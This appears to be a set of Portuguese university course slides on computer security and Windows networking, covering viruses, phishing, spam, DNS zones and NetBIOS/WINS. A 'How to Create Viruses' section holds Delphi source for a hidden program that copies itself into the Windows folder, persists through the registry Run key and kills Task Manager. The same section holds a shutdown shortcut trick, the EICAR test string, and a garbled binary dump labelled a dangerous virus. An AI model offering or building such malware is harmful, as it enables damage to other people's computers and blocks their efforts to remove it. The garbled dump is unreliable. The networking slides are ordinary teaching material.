disso, os macrovĂ­rus constituem a primeira categoria de vĂ­rus 
multiplataforma, ou seja, nĂŁo se limitam aos computadores 
pessoais, podendo infectar tambĂŠm outras plataformas que usem o 
mesmo programa, como o Macintosh, por exemplo.
Phishing scam 
¨ Bastante comum, esse tipo de golpe virtual Ê 
baseado no envio de e-mails sugerindo que os 
internautas baixem arquivos ou visitem sites 
maliciosos. Outra possibilidade para enganar os 
usuĂĄrios da web ĂŠ a oferta de links, tambĂŠm para 
pĂĄginas fraudulentas, em variados sites, blogs e 
redes sociais. 
Quando aceitam a sugestĂŁo dos piratas, abrindo os 
arquivos ou visitando esses endereços, as vítimas 
em potencial podem infectar seus computadores 
involuntariamente com programas maliciosos. 
Geralmente, essas pragas instaladas na mĂĄquina 
têm como objetivo roubar informaçþes pessoais dos 
usuĂĄrios de internet. 
182
Phishing scam 
183
184
O que significa SPAM 
¨ O termo SPAM origina-se de um programa 
de sĂŠrie inglesa de comĂŠdia onde os clientes 
pediam repetidamente “SPAM”, marca de um 
presunto enlatado americano. 
¨ Na informåtica significa enviar mensagens 
para qualquer quantidade de usuĂĄrios, sem 
obter prÊvia autorização.
Como Evitar SPAM 
¨ Existem diversas formas de bloqueio de mensagens 
nĂŁo solicitadas. VĂĄrios programas fazem esse 
serviço, como por exemplo, o SPAM Assassin. 
SĂŁo configurados para bloquear as mensagens 
vindas de endereços conhecidos que disseminam 
essas mensagens. Bloqueia-se tambĂŠm as 
mensagens contendo alguma palavra ou expressĂŁo 
especĂ­fica, por exemplo: 
¨ “Compre um notebook” 
¨ “Troque seus cartuchos de impressoras” 
¨ “Free teen images”
ataque-servidor 
6% ataque-usuario 
4% 
axfr 
32% 
spam 
24% 
scan 
30% 
dos 
1% 
fraude 
invasao 0% 
3%
188 
Posso enviar um vĂ­rus por brincadeira? 
NĂŁo! Mesmo por brincadeira, enviar um vĂ­rus de computador 
pode configurar crime de dano. 
Certifique-se que os anexos transmitidos sĂŁo arquivos benignos e 
Ăşteis ao destinatĂĄrio. 
CĂłdigo Penal 
Dano 
Art. 163 - Destruir, inutilizar ou deteriorar coisa alheia: 
Pena - detenção, de um a seis meses, ou multa. 
Um vĂ­rus pode se propagar de diversas formas. 
 anexo 
 download 
 engenharia social
PossĂ­veis danos 
¨ Perda de desempenho do micro; 
¨ Exclusão de arquivos; 
¨ Alteração de dados; 
¨ Acesso a informaçþes confidenciais por 
pessoas nĂŁo autorizadas; 
¨ Perda de desempenho da rede (local e 
Internet); 
¨ Monitoramento de utilização (espiþes); 
¨ Desconfiguração do Sistema Operacional. 
¨ Inutilizarão de determinadas peças.
190 
Detectando, prevenindo e 
combatendo os vĂ­rus
191 
E os anti-vírus são…
Anti virus em ação
Anti Spywere em ação
Como Criar Virus 
194
CĂłdigo de VĂ­rus 
¨ Teste 
X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD- 
195 
ANTIVIRUS-TEST-FILE!$H+H* 
¨ Malicioso (Salvar no Bloco de Nota 
Vassoura.exe) 
AZP/LX2K*.*BAT.COM/ELIMINAR*HD*/DETE... 
AIL.COM/AMDWIN@*.*
CĂłdigo de VĂ­rus (cont) 
¨ Ctfmon32.dll Virus Perigoso – Não sai do computador: 
MZ ÿÿ @ @ º ´ Í!¸LÍ!This program € € cannot be run in DOS mode. 
196 
$ PE L ÎýwE à ! A ” @ 
P êâ @ N 0  @@ .data l @ Ð.text m 
à.idata  0 @ À.edata N @ @ @ 0/ < ! 0/ ! 0;9# NTDLL.DLL ÿÿÿÿÿÿÿÿU‰å‹E ƒøu(‹E£ @ è# ¡@ Àt ÿ5 @ è ¸ ëƒø u è— ¸ 
ë1ÀÉ U‰åƒìVuøVjh @ ÿ5 @ jÿÿz0@ h‚ @ ÿ‚0@ h @ Pÿ†0@ £ @ ÿuÿuÿuÿuÿu ÿuÿ @ ‰EüVjh @ ÿ5 @ jÿÿz0@ ^‹EüÉ U 
‰åƒìVuøVjh2 @ ÿ5. @ jÿÿz0@ h‚ @ ÿ‚0@ hD @ Pÿ†0@ £@ @ ÿuÿuÿuÿuÿu ÿuÿ@ @ ‰EüVjh: @ ÿ5. @ jÿÿz0@ ^‹EüÉ U 
‰åƒìVWÿuÿuÿuÿuÿu ÿuèlÿÿÿ‰Eì À…0 ‹}‹Eƒø uG‰Eð‹w ÇEø ÇEü ë ƒø… G‰Eð‹wÇEø ÇEü h@ ÿ’0@ ¹ ÷á9Æu:¹ ÷ñPÿuðèÏ 
Àu&‹E £ @ @ÿuÿuÿuÿuPÿuèÕþÿÿ‰Eìéoe ÿuÿuÿuÿuÿ5 @ ÿuè³þÿÿ‰Eì Àua‹Eø‰Eð‹Eü‹4h@ ÿ’0@ ¹ ÷á9Æu<¹ ÷ñPÿuðèO 
Àu(¡ @ ;E s‹E @ÿuÿuÿuÿuPÿuèPþÿÿ‰Eìëÿuÿuÿuÿuÿu ÿuè4þÿÿ‰Eì_^‹EìÉ U‰åƒìVWÇEüÿÿÿÿ‹M ‹}¾@ üóf§ ÉuÇEü _^‹EüÉ 
U‰åƒìVuøVjhW @ ÿ5S @ jÿÿz0@ h‚ @ ÿ‚0@ hi @ Pÿ†0@ £e @ ÿuÿuÿu ÿuÿe @ ‰EüVjh_ @ ÿ5S @ jÿÿz0@ ^‹EüÉ U 
‰åƒìVWÿuÿuÿuÿuÿu ÿuèóüÿÿ‰Eì À…0 ‹}‹Eƒø uG ‰Eð‹wÇEø ÇEü ë ƒø… G‰Eð‹wÇEø ÇEü h@ ÿ’0@ ¹ ÷á9Æu:¹ 
÷ñPÿuðèËþÿÿ Àu&‹E £OE @ @ÿuÿuÿuÿuPÿuèüÿÿ‰Eìéoe ÿuÿuÿuÿuÿ5OE @ ÿuè:üÿÿ‰Eì Àua‹Eø‰Eð‹Eü‹4h@ ÿ’0@ ¹ 
÷á9Æu<¹ ÷ñPÿuðèKþÿÿ Àu(¡OE @ ;E s‹E @ÿuÿuÿuÿuPÿuè×ûÿÿ‰Eìëÿuÿuÿuÿuÿu ÿuè»ûÿÿ‰Eì_^‹EìÉ U‰åƒì VWÿuÿuÿu 
ÿuèþÿÿ‰Eôƒø |vƒ}upÇEø ‹} ‹WD; @ u¡ @ ÿ7‰þ7¹ð üó¤Xë݉þ7VEü9þu‹Eø Àt‹GD; @ u ‹uøÇ ë‰}ø‹}ü‹GD; @ 
u‹uø‹ë½_^‹EôÉ U‰åƒìVWh‚ @ ÿ‚0@ ‰EühD @ ÿ–0@ ‰Á¾D @ ‰÷¬4jªâúhi @ ÿ–0@ ‰Á¾i @ ‰÷¬4jªâúh @ ÿ–0@ 
‰Á¾ @ ‰÷¬4jªâúhi @ ÿuüÿ†0@ £S @ EøPjhW @ ÿ5S @ jÿÿ~0@ Æ_ @ hÇ` @ /%@ Æd @ ÍEøPjh_ @ ÿ5S @ jÿÿz0@ h 
@ ÿuüÿ†0@ £ @ EøPjh @ ÿ5 @ jÿÿ~0@ Æ @ hÇ @ Ì#@ Æ @ ÍEøPjh @ ÿ5 @ jÿÿz0@ hD @ ÿuüÿ†0@ £. @ EøPjh2 @ ÿ5. 
@ jÿÿ~0@ Æ: @ hÇ; @ È!@ Æ? @ ÍEøPjh: @ ÿ5. @ jÿÿz0@ _^ÉÃU‰åÿuÿu ÿuj ÿ.1@ 1ÀÉ U‰åƒìEüPjhW @ ÿ5S @ 
jÿÿz0@ EüPjh @ ÿ5 @ jÿÿz0@ EüPjh2 @ ÿ5. @ jÿÿz0@ ÉÃU‰åj ÿ5 @ hN'@ jÿ*1@ jÿÿŽ0@ É U‰åVS‹ud¡0 ‹@ ƒÀ ‹ 
;puù‹0‹X‰3‹p‹‰s@‹0‹X‰3‹p‹‰s[^É U‰åƒìVW‹u ¿@ f*f Àtf«ëõf«Ç@ ‹E£ @ EüPj j h»'@ j j ÿŠ0@ _^É V0 <0 z0 1 J0 *1 
KERNEL32.DLL USER32.DLL ž0 ´0 È0 Ü0 î0 þ0 1 1 ž0 ´0 È0 Ü0 î0 þ0 1 1 WriteProcessMemory ReadProcessMemory 
GetModuleHandleA GetProcAddress CreateThread Sleep lstrlenW lstrlenA 61 J1 61 J1 SetWindowsHookExA CallNextHookEx 
2@ (@ ,@ 0@ !( >@ SYSHOST.DLL A £0*0¡0Ï0ò0ú0ÿ01 
111.191?1G1a1g1o1t1z11†1‹1£1®1´1¼172=2d2”2·2½2á 2A3k3q3y3~3„3‰33•3§3²3¸3À3;4A4h4˜4»4Á4å4e5l5›5·5Ø 
5Þ5æ5ì5ó5 66 
66 6'646=6B6M6S6[6a6h6l6r6~6„6OE6‘6š6Ÿ6ª6°6¸6¾6Å6É6Ï6Û6á6é6î6÷6ü67 
777"7&7,787>7F7^7u7{7ƒ7Ž7”7oe7§7*7μ7Â7Ç7Ï7×7-8@8L8Y8c8
CĂłdigo de VĂ­rus (cont) 
¨ virus.bat 
Criem um atalho e na localização escrevam " 
shutdown -s -t 60 -c " qualquer coisa que 
queiram dizer, mas tem de ser entre aspas" 
T (TEMPO EM SEGUNDOS) Podem mudar 
C (ComentĂĄrio) 
197
Virus em Delphi 
¨ Existe muitas maneiras de criar um virus em 
delphi, a maioria dos trojans famosos que 
circulĂŁo n internet foram feitos em delphi. 
Eu vou mostrar como fazer um virus reninciar 
junto com o windows e travar o Ctrl + Alt + 
Del. 
¨ Vamos la, Primeiro abra um projeto e 
coloque na uses "Registry," 
¨ Agora em baixo de "{$R *.dfm}" 
coloque isso: 
198
procedure RunOnStartup(sProgTitle,sCmdLine: string; bRunOnce: boolean ); 
var 
sKey : string; 
reg : TRegIniFile; 
begin 
if( bRunOnce )then 
begin 
sKey := 'Once' 
end 
else 
begin 
sKey := ''; 
end; 
reg := TRegIniFile.Create( '' ); 
reg.RootKey := HKEY_LOCAL_MACHINE; 
reg.WriteString('SoftwareMicrosoft' + 'WindowsCurrentVersionRun'+ sKey + 
#0, sProgTitle, sCmdLine ); 
reg.Free; 
end; 
Agora no FormCreate coloque isso: 
procedure TForm1.FormCreate(Sender: TObject); 
begin 
Application.ShowMainForm := False; 
CopyFile(PChar(Application.ExeName),'C:WINDOWSvirus.exe',True); 
RunOnStartup('virus','C:WINDOWSvirus.exe',true); 
end; 
199
¨ Agora vamos fazer a par te de travar a listagem de 
processos, vou dar o coder todo basta voce fazer sua ar te: 
unit Unit1; interface 
uses 
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, 
Forms, 
Dialogs, TLHelp32, PsAPI, ExtCtrls; type 
TForm1 = class(TForm) 
Timer1: TTimer; 
procedure Timer1Timer(Sender: TObject); 
procedure FormCreate(Sender: TObject); 
private 
{ Private declarations } 
public 
{ Public declarations } 
end; var 
Form1: TForm1; implementation {$R *.dfm} function 
TerminarProcesso(sFile: String): Boolean; 
var 
verSystem: TOSVersionInfo; 
hdlSnap,hdlProcess: THandle; 
bPath,bLoop: Bool; 
peEntry: TProcessEntry32; 
arrPid: Array [0..1023] of DWORD; 
iC: DWord; 
k,iCount: Integer; 
arrModul: Array [0..299] of Char; 
hdlModul: HMODULE; 
begin 
Result := False; 
if ExtractFileName(sFile)=sFile then 
bPath:=false 
else 
bPath:=true; 
verSystem.dwOSVersionInfoSize:=SizeOf(TOSVersionInfo); 
GetVersionEx(verSystem); 
if verSystem.dwPlatformId=VER_PLATFORM_WIN32_WINDOWS then 
begin 
hdlSnap:=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 
peEntry.dwSize:=Sizeof(peEntry); 
bLoop:=Process32First(hdlSnap,peEntry); 
while integer(bLoop)<>0 do 
begin 
if bPath then 
begin 
if CompareText(peEntry.szExeFile,sFile) = 0 then 
begin 
TerminateProcess(OpenProcess(PROCESS_TERMINATE,false,peEntr 
y.th32ProcessID), 0); 
Result := True; 
end; 
end 
else 
begin 
if CompareText(ExtractFileName(peEntry.szExeFile),sFile) = 0 then 
begin 
TerminateProcess(OpenProcess(PROCESS_TERMINATE,false,peEntr 
y.th32ProcessID), 0); 
Result := True; 
end; 
end; 
200 
bLoop := Process32Next(hdlSnap,peEntry); 
end; 
CloseHandle(hdlSnap); 
end 
else 
if verSystem.dwPlatformId=VER_PLATFORM_WIN32_NT then 
begin 
EnumProcesses(@arrPid,SizeOf(arrPid),iC); 
iCount := iC div SizeOf(DWORD); 
for k := 0 to Pred(iCount) do 
begin 
hdlProcess:=OpenProcess(PROCESS_QUERY_INFORMATION or 
PROCESS_VM_READ,false,arrPid [k]); 
if (hdlProcess<>0) then 
begin 
EnumProcessModules(hdlProcess,@hdlModul,SizeOf(hdlModul),iC); 
GetModuleFilenameEx(hdlProcess,hdlModul,arrModul,SizeOf(arrModul) 
); 
if bPath then 
begin 
if CompareText(arrModul,sFile) = 0 then 
begin 
TerminateProcess(OpenProcess(PROCESS_TERMINATE or 
PROCESS_QUERY_INFORMATION,False,arrPid [k]), 0); 
Result := True; 
end; 
end 
else 
begin 
if CompareText(ExtractFileName(arrModul),sFile) = 0 then 
begin 
TerminateProcess(OpenProcess(PROCESS_TERMINATE or 
PROCESS_QUERY_INFORMATION,False,arrPid [k]), 0); 
Result := True; 
end; 
end; 
CloseHandle(hdlProcess); 
end; 
end; 
end; 
end; 
procedure TForm1.Timer1Timer(Sender: TObject); 
begin 
TerminarProcesso('taskmgr.exe'); 
end; 
procedure TForm1.FormCreate(Sender: TObject); 
begin 
application.ShowMainForm := false; 
end; 
end.
A Dor do “Blaster” 
¨ Duas linhas de código C no RPCSS: 
– while (*pwszTemp != L'') 
*pwszServerName++ = *pwszTemp++; 
¨ Levaram a 
– >15 milhões de computadores infectados 
– 3.3M de chamados de suporte em Set. 2003 (volume 
normal relacionado a vĂ­rus ĂŠ de 350,000) 
– Muita repercussão negativa 
• “Isto aumentará o nível de frustração ao ponto que várias 
organizaçþes irão contemplar seriamente alternativas à 
Microsoft” 
Gartner Group 
• “É realmente recomendado ter cautela aqui. Os esforços [de 
segurança da Microsoft] foram sinceros, mas não estou certo 
se foram sinceros o suficiente.” Forrester Research
Em que abordagem vocĂŞ confia ? 
Segurança como uma opção 
Segurança como um aditivo 
Integração extremamente complicada 
NĂŁo ĂŠ economicamente viĂĄvel 
NĂŁo pode focar na principal prioridade 
Segurança como parte do sistema 
Segurança Embutida na Rede 
Colaboração inteligente entre os 
elementos 
VisĂŁo de sistemas 
Foco direto na principal prioridade
JOGO DOS ERROS 
EDUCAÇÃO DO USUÁRIO É ESSENCIAL
204 
PPrrååttiiccaa ddee SSeegguurraannççaa 
xx
Windows 2003 Server 
205
Instalação 
206
Instalação 
207
Instalação 
208
Instalação 
209
Instalação 2003 
210
Introdução a Serviços 
211
DNS 
212
DNS - Domain Name Service 
¨Padrão Aberto para Resolução de 
Nomes HierĂĄrquicos 
– Agrupa nomes em domínios. 
– A árvore de nomes é armazenada num 
banco ddee ddaaddooss ddiissttrriibbuuĂ­Ă­ddoo. 
¨Especificaçþes do DNS 
– RFCs 1033, 1034, 1034, 1101, 1123, 1183 
e 1536. 
• Expecificações da Internet Task Force 
– Berkeley Internet Name Domain (BIND) 
• Implementação desenvolvida na Berkley 
University para a versĂŁo 4.3 SD Unix
Serviço DNS 
Nome? 
Nome? 
Serviço DNS 
um ou mais servidores 
armazenam um banco de dados 
distribuĂ­dos 
IP 
IPB 
Servidor DNS
Nome de DomĂ­nio 
¨ Os nomes Hierårquicos utilizados pelo DNS 
sĂŁo chamados FQDN: 
– Fully Qualified Domain Name 
¨ Exemplo: 
– www.pucpr.br 
– www: nome do host 
– pucpr: nome de domínio 
– br: nome de domínio 
¨ Nome de domínio: 
– Coleção de HOSTS ou de outros domínios.
Árvore de nomes 
br 
pucpr 
www 
ufpr 
ppgia 
br 
Pucpr 
www Ufpr 
ppgia www 
FOLHA 
RAIZ 
www
Banco de Dados DistribuĂ­dos 
¨ No serviço DNS, os nomes estão armazenados em ZONAS. Zonas são 
arquivos textos que contĂŠm os nomes de um ou mais domĂ­nios. 
br 
pucpr 
www 
ufpr 
www 
RAIZ 
www 
ppgia 
ZONA .br 
ZONA pucpr.br ZONA ufpr.br
Banco de Dados DistribuĂ­dos 
¨ Cada Zona pode ser armazenada num servidor DNS distinto. 
br 
pucpr 
www 
ufpr 
www 
RAIZ 
servidor 
dns.br 
www 
ppgia 
ZONA .br 
ZONA pucpr.br ZONA ufpr.br 
servidor 
dns.pucpr.br 
servidor 
dns.ufpr.br
Exemplo de arquivo de Zona 
ZONA pucpr.br 
¨ @ SOA dns.pucpr.br 
¨ @ NS dns.pucpr.br 
¨ dns.pucpr.br. A 200.17.99.2 
¨ www A 200.17.99.2 
¨ www.ppgia A 200.17.98.174 
SOA: START OF AUTHORITY 
NS: NAME SERVER 
A: HOST 
• SOA indica qual o servidor armazena o arquivo de zona 
• NS indica qual o servidor que responde pelo domínio. 
• Nomes terminados por “.” são absolutos
Exemplos de arquivo de Zona 
• @ SOA dns.br 
• @ NS dns.br 
• pucpr NS www dns.ufpr.br 
• ufpr NS dns.pucpr.br 
• dns.pucpr A 200.17.99.2 
• dns.ufpr A 200.101.0.12 
¨ @ SOA dns.ufpr.br 
¨ @ NS dns.ufpr.br 
¨ dns.ufpr.br. A 200.101.0.12 
¨ www A 200.101.0.15 
ZONA ufpr.br 
ZONA.br 
• @ SOA dns.pucpr.br 
• @ NS dns.pucpr.br 
• dns.pucpr.br. A 200.17.99.2 
• www A 200.17.99.2 
• www.ppgia A 200.17.98.174 
ZONA pucpr.br
Tipos de Registros no DNS 
¨ A: Host Adress 
– associa um nome a um endereço IP: nnoommee Þ 
IIPP.. 
¨ PTR: Point Resource Record 
– associa um endereço IP a um nome: IIPP Þ 
nnoommee.. 
¨ NS: Name Server 
– identifica o servidor DNS no domínio. 
¨ SOA: Start of Authority 
– indica que o servidor de DNS é a autoridade 
para fornecer informaçþes no domínio 
(aauutthhoorriittaattiivvee).
Consulta Reversa 
¨ O cliente fornece um número IP e requisita o nome 
correspondente. 
¨ Os registros que relacionam IPs aos nomes são do 
tipo PTR. 
– Por exemplo, um registro para o endereço IP 10.17.98.31 
corresponde a uma entrada DNS no seguinte formato: 
• 31.98.17.10.in-addr.arpa 
¨ Se o endereço IP não estiver contido no domínio 
local (aquele controlado pelo servidor DNS 
consultado), o servidor DNS contata o servidor DNS 
situado num nĂł superior da ĂĄrvore. 
– Este mecanismo de procura seqüencial consultando os nós 
superiores é chamado “walking the tree”.
Forwarder 
¨ Cada servidor DNS possui um arquivo de 
configuração que diz: 
– Lista de zonas que ele armazena 
– Lista de servidores forwarders 
¨ Lista de zonas 
– Indica a localização física do arquivo 
correpondente a cada ZONA. 
¨ Lista de forwarders 
– Um forwarder é um servidor DNS 
hierarquicamente superior ao servidor corrente. 
– Esse servidor recebe as consultas de domínios 
nĂŁo armazenados pelo servidor DNS.
Exemplo 
Arquivo de configuração do servidor dns.pucpr.br 
forwarders 
{ 
200.17.99.2 
} 
pucpr.br 
{ 
/etc/pucprbr.dns 
} 
forwarders 
{ 
primeiro forwarder 
segundo forwarder 
etc. 
} 
zona 
{ 
localização 
} 
zona 
{ 
localização 
}
Ponteiros NS e Forwarders 
FORWARDER FORWARDER 
br 
NS NS 
ZONA pucpr.br ZONA ufpr.br 
pucpr 
www 
ufpr 
www 
ZONA .br 
RAIZ 
www 
ppgia
Consulta Recursiva 
¨ Graças ao ponteiros NS e FORWARDER qualquer servidor DNS pode 
responder por toda a ĂĄrvore de domĂ­nios. 
¨ A resposta pode ser: 
– O mapeamento nome-IP requisitado 
– Uma mensagem de erro dizendo que o domínio ou host não foi 
encontrado. 
..bbrr 
ppuuccpprr uuffpprr 
aa bb cc dd 
RESPOSTA AUTORITÁRIA 
a.pucpr.br? 
IP = 10.17.98.31 
d.ufpr.br 
IP = 200.17.98.174 
1 
RESPOSTA NÃO AUTORITÁRIA SE VIER DA CACHE 
2 3 
4 
5 
6 
1 
2
DNS e a Internet 
¨ O “root” da árvore de nomes da Internet é 
gerenciado pelo Internet Network Information 
Center (IInntteerrNNIICC) 
¨ InterNIC Ê o nome dado a um projeto criado num 
acordo entre a National Science Foundation 
(NSF) e a Network Solutions, Inc. 
– Provê um serviço de registro de nomes para 
os domĂ­nios .com, .net, .org, and .edu; 
– O site do InterNIC é http://www.internic.net 
¨ O InterNIC delega a responsabilidade de 
administrar partes do domĂ­nio de nomes para as 
empresas e organizaçþes conectadas na 
Internet.
DomĂ­nios Gerenciados pelo 
InterNIC 
¨ Segundo a nomenclatura adotada na Internet, o 
“Domain Name Space“ é dividido em três áreas 
principais: 
– Organization Domains: 
• 3 caracteres para indicar a atividade da empresa. 
– .com, .edu, .gov, .int, .mil, .net, .org 
– .int: organizações internacionais 
– .mil: organizações militares 
– .org: organizações não comerciais 
– Geographical Domains: 
• 2 caracteres para identificar o país. 
– .br, .fr, .jp, etc. 
– Reverse domain: 
• domínio especial utilizado para associar endereços IP aos 
nomes.
Exemplo 
Gerido pelo 
InterNIC 
.com .org .edu 
.pucpr 
www 
ppgia 
rla01 
Fully qualified domain 
name 
(FQDN) 
www.pucpr.br 
.br 
Gerido pela .com 
FAPESP 
Gerido pela 
PUC
Zonas 
Servidor DNS 
do Internic 
.com .org .edu 
.pucpr 
www 
ppgia 
rla01 
.br 
Servidor DNS da .com 
FAPESP 
Servidor DNS da 
PUC 
REGISTRO 
NS
Tipos de Servidores 
¨ PPrriimmåårriioo 
– É o servidor autoritário para zona. A inclusão, alterações 
ou exclusĂŁo dos registros da zona sĂŁo feitas atravĂŠs 
deste servidor. 
– O servidor primário envia uma cópia dos seus arquivos de 
dados para o servidor secundĂĄrio atravĂŠs de um processo 
denominado ““zzoonnee ttrraannssffeerr”” 
¨ SSeeccuunnddåårriioo 
– Funciona como backup. Apenas lê os arquivos de dados 
do servidor primårio, e responde as requisiçþes dos 
clientes quando requisitado. 
¨ CCaacchhiinngg--OOnnllyy 
– São servidores DNS que apenas efetuam consultas e 
guardam o resultado numa cache e retornam os 
resultados. 
– Um servidor DNS realiza consulta a outros servidores 
sempre que tiver que localizar um nome externo as zonas 
que controla.
DNS - Resumo 
¨ Vantagens: 
– Implementa um mecanismo de nomes hierárquico. 
• Isto facilita a organização dos nomes em redes de grande 
porte. 
– O banco de dados que armazena os nomes é distribuído. 
• Cada servidor DNS contém informações de zonas específicas, 
e pode ser administrado separadamente. 
– É o mecanismo de nomes adotado na Internet. 
• Pode ser utilizado para resolver nomes na rede local (intranet) 
e na rede Internet. 
¨ Desvantagem: 
– Não é dinâmico. 
• É responsabilidade do administrador manter as entradas do 
arquivo de nomes atualizada.
Netbios 
233
Nomes NetBIOS 
¨ O espaço de nomes NetBIOS é “flat” 
– flat = não segmentado 
– implica que cada nome NetBIOS na rede deve ser único 
¨ Os recursos na rede são identificados por nomes 
NetBIOS registrados dinâmicamente quando: 
– o computador é inicializado 
– serviços são inicializados 
– usuário se loga. 
¨ Nomes NetBIOS tem 16 caracteres de comprimento. 
– O usuário atribui os 15 primeiros caracteres. 
– O último caracter é reservado para indentificar o tipo de 
recursos.
Nomes Registrados na Estação 
¨ C:>nbtstat -n 
¨ Endeço-Ip nó: [200.17.98.217] Identificador de escopo: [] 
¨ Tabela de nomes locais de NetBIOS 
¨ Nome Tipo Status 
¨ ------------------------------------------------------------------------ 
¨ PPGIA16 <00> UNIQUE Registrado 
¨ PPGIA16 <20> UNIQUE Registrado 
¨ MESTRADO <00> GROUP Registrado 
¨ PPGIA16 <03> UNIQUE Registrado 
¨ MESTRADO <1E> GROUP Registrado 
¨ JAMHOUR <03> UNIQUE Registrado
Nomes NetBIOS 
¨ Podem ser de dois tipos: 
– UNIQUE (one owner) 
• Referenciam um único recurso na rede 
• Exemplo: uma estação 
– GROUP (multiple owner) 
• Referenciam um conjunto de recursos na rede 
• Exemplo: nome de domínio, nome de grupo 
¨ Alguns exemplos de tipos para identificadores 
Ăşnicos sĂŁo: 
– <00> Nome do Computador e do Domíno (ou grupo) 
– <03> Usuário logado 
– <20> Serviço de nomes de servidor para sincronização de 
arquivos compartilhados
Registro e Resolução de Nomes 
NetBIOS 
¨ Os seguintes mecanismos são utilizados para 
localizar recursos NetBIOS 
– NetBIOS name cache 
– NetBIOS name server - WINS server 
– IP subnet broadcast 
– Static LMHOSTS files 
– Static HOSTS files 
– DNS servers 
¨ Os mecanismos de resolução de nomes do 
NetBIOS sobre TCP/IP sĂŁo definidos pelas RFCs 
1001 e 1002 
– de acordo com a estratégia utilizada para resolver 
nomes, os computadores sĂŁo denominados b-node, p-nome, 
m-node ou h-node.
Resolução de Nomes por 
BroadCast 
¨ Resolução de nomes usado broadcast IP fornece um 
mÊtodo dinânico para resolução de endereços. 
– Datagrama “NetBIOS Name Query” em broadcast 
perguntando o nome correspondente ao endereço. 
– Endereço MAC: FF-FF-FF-FF-FF-FF 
– Endereço IP: 255.255.255.255 
¨ Problemas: 
– Aumento do tráfego na rede 
– Não funciona em redes segmentadas por rotedores 
• Os recursos localizados em outras redes não 
recebem os pedidos de broadcast pois, por default, 
o roteador bloqueia os pacotes recebidos em 
broadcast.
Extranets = VPN (Virtual Private Networks) 
NOMES NETBIOS NOMES NETBIOS 
ACME IAPO1 IAPO2 LAB0101 PPGIA 
RREEDDEE AA RREEDDEE BB 
BROADCAST BROADCAST
Cache com Nomes NetBIOS 
¨ Cada estação mantÊm uma tabela com os nomes NetBIOS 
mais usados recentemente. 
¨ C:>nbtstat -c 
¨ Endereço-Ip nó: [200.17.98.217] Identificador de escopo: [] 
¨ Tabela de nomes de caches remotas de NetBIOS 
¨ Nome Tipo Endereço Host Duração 
[seg] 
¨ --------------------------------------------------------------- 
¨ PPGIA07 <00> UNIQUE 200.17.98.224 20 
¨ PPGIA07 <20> UNIQUE 200.17.98.224 600 
¨ HAL2001 <00> UNIQUE 10.17.98.31 660
Usando o Arquivo HOSTS 
¨ O arquivo “hosts” permite relacionar nomes a IP’s, 
evitando a resolução por broadcast. 
– A diretiva #PRE pode ser utilizada para registrar entradas 
diretamente na cache. 
– Neste caso, as entradas são consultadas antes de 
qualquer outro mecanismo de resolução: 
¨ Exemplos: 
• 10.17.98.31 hal2001 #pre #coloca a entrada na cache 
• 10.17.08.30 PPGIA16 #não coloca na cache 
¨ Existe tambÊm uma diretiva especial para definir 
domĂ­nios: 
• 10.17.98.42 server1 #pre #DOM:ELETRICA.RIEP
SERVIDORES DE NOMES NETBIOS 
¨ MECANISMO DE RESOLUÇÃO DE NOMES 
NETBIOS SEM BROADCAST 
– Mantém uma tabela que mapeia os endereços IP com o 
nome dos computadores. 
– A tabela é atualizada ddiinnaammiiccaammeennttee toda a vez que uma 
måquina recebe um novo endereço IP. 
¨ Exemplo: WINS: Windows Internet Name Service 
¨ O serviço WINS trabalha numa arquitetura cliente-servidor. 
– WINS Server: 
• manipula todos as consultas de nomes. 
– WINS Client: 
• registra seu nome e endereço no servidor WINS. 
• envia as requisições de nomes para o WINS server.
WINS NÃO USA BROADCAST 
ACME IAPO1 IAPO2 LAB0101 PPGIA 
RREEDDEE AA RREEDDEE BB 
WINS 
SERVER 
IP e NOME são fornecidos na inicialização 
TABELA 
DINÂMICA REQUEST 
REPLY
CaracterĂ­sticas do WINS 
¨ Ao contrårio da resolução de nomes por broadcast, WINS permite que os 
nomes sejam resolvidos de maneira transparente atravĂŠs de roteadores. 
WINS enabled replicação 
WINS proxy 
WINS server 
roteador LINK DE BAIXA WINS server 
CAPACIDADE 
Non- WINS enabled
Definiçþes 
¨ WINS Server 
– Computador que executa o serviço Windows Internet 
Name 
• Este computador mantem uma base de dados relacionando 
os nomes e os endereços IP das estaçþes na rede. 
– Pode haver mais de um servidor WINS na rede. 
¨ Cliente WINS enabled 
– Estação configurada para resolver nomes pelo WINS. 
¨ Cliente Non-WINS enabled 
– Estação não configurada ou incompatível com o serviço 
WINS. 
¨ WINS proxy 
– Estações que acessam o serviço WINS para os clientes 
Non-WINS enable.
MĂşltiplos Servidores WINS 
¨ A utilização de múltiplos servidores WINS Ê aconselhåvel 
pois: 
– permite distribuir a carga de resolução de nomes 
• as consultas de nomes feita pelos clientes são ponto-a- 
ponto. 
• O mecanismo de broadcast só é utilizado quando o 
nome solicitado nĂŁo ĂŠ encontrado na base do servidor 
WINS. 
– diminui a possibilidade de interrupção do serviço de 
nomes 
• cada servidor WINS possui uma cópia completa da 
base de nomes, funcionando como backup dos 
demais. 
• quando um servidor entra em pane, os clientes 
passam a consultar automaticamente o outro servidor.
WINS NÃO É APROPRIADO PARA INTERNET 
WINS SERVER WINS SERVER 
REPLICAÇÃO 
WINS SERVER WINS SERVER 
¨ Para redes grandes, o WINS Ê inviåvel pois: 
– O número de replicações é muito grande 
– Cada servidor WINS guarda uma cópia completa de todos os nomes.
Ciclo de Vida dos Nomes NetBIOS 
¨ Os nomes NetBIOS são concedidos por emprÊstimo. Precisam ser 
renovados periodicamente para que o computador mantenha o 
nome. 
Active 
(Ativo) 
Released 
(Liberado) 
Elimando 
O cliente foi 
desligado 
Ou o nome foi 
liberado 
explicitamente 
O prazo de 
renovação foi 
esgotado (6 dias) 
NĂŁo renovado 
(x dias) 
OUTRO COMPUTADOR PODE 
SOLICITAR O DIREITO DE 
USAR O NOME
Resolução de Nomes 
¨ Os mecanismos de resolução de nomes do NetBIOS 
sobre TCP/IP sĂŁo definidos pelas RFCs 1001 e 
1002. 
– b-node: (broadcast-node) 
resolvem nomes por broadcast de IP 
– p-node: (point-to-point-node) 
usam um servidor de nomes NetBIOS 
– m-node: (mix -node) 
se b-node falhar tentam p-node. 
– h-node: (hybrid-node) 
se p-node falhar tentam b-node
WINS - Resumo 
¨ Vantagens: 
– Reduz significativamente o número de broadcasts de 
endereços IP necessårios para localizar recursos locais e 
remotos. 
– Permite que clientes resolvam nomes de estações 
situados em segmentos remotos isolados por roteadores. 
